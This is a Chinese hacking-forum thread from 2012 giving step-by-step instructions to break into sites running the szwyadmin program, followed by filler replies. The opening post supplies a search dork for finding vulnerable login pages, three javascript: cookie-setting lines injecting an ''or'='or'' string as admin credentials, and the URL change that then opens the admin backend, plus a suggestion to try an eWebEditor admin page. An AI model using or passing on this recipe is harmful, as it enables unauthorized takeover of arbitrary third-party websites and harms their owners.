查看: 2996|回复: 25

szwyadmin程序cookies欺骗漏洞拿shell

[复制链接]
发表于 2012-9-30 06:25:11 | 显示全部楼层 |阅读模式
首先我们在Google中搜索关键词关键字:inurl:szwyadmin/login.asp

任意打开一个搜索结果,打开登录界面后在地址栏中输入下面的代码:
代码:

javascript:alert(document.cookie="adminuser="+escape("'or'='or'"));
javascript:alert(document.cookie="adminpass="+escape("'or'='or'"));
javascript:alert(document.cookie="admindj="+escape("1"));
关闭此页面

在次打开登录界面,在地址栏中将login.asp改为admin_index.asp,就直接进入后台了

另外还可以试试,ewebeditor/admin_login.asp
[/td][/tr]
[/table]
发表于 2012-9-30 16:32:36 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2012-10-2 05:13:02 | 显示全部楼层
床前明月光,低头吃便当!  
发表于 2012-10-6 15:46:51 | 显示全部楼层
看贴回复是好习惯  
发表于 2012-10-8 07:49:35 | 显示全部楼层
这样的贴子,不顶说不过去啊  
408226286 该用户已被删除
发表于 2012-10-9 04:37:15 | 显示全部楼层
提示: 作者被禁止或删除 内容自动屏蔽
发表于 2014-12-26 15:35:24 | 显示全部楼层
(*^__^*) 嘻嘻……  
发表于 2015-1-26 21:58:30 | 显示全部楼层
挤在北京,给首都添麻烦了……  
发表于 2015-1-30 16:00:26 | 显示全部楼层
(*^__^*) 嘻嘻……   
发表于 2015-3-4 05:35:23 | 显示全部楼层
我假装认真地工作,老板假装认真地付薪水  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则